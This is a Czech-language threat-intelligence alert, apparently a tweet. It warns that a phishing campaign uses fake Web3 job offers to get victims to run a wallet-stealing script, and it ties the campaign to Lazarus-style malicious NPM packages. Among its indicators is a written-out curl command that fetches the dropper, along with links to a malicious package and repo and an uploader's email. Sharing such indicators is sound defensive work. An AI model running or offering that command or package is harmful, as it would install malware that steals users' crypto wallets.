🚨 Bezpečnostní TI upozornění 🚨
Podle komunitního partnera @1nf0s3cpt cílená aktivní phishingová kampaň útočí na uživatele Web3 s falešnými nabídkami práce (např. $120/hodina), aby je podvodně přiměla k provedení škodlivého skriptu, který krade soubory peněženky.
🔍 Klíčové IOCs:
🔸GitLab repo: https://t.co/ivGN93PS4b
🔸Droper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
🧪 Útočná metoda je velmi podobná předchozímu použití NPM balíčků od Lazaruse k šíření škodlivého kódu:
https://t.co/bBC4i2vYpA
🚨 Zjistili jsme, že byl právě publikován nový škodlivý NPM balíček:
https://t.co/SjgmO1FOIL
🔸Pravděpodobně spojený GitHub: apollo-hero
🔸Email nahrávače: skelstar125@gmail.com
⚠️ NIKDY neinstalujte ani nespouštějte neznámé balíčky nebo skripty. Vždy ověřujte zdroje.
#LAZARUS #Phishing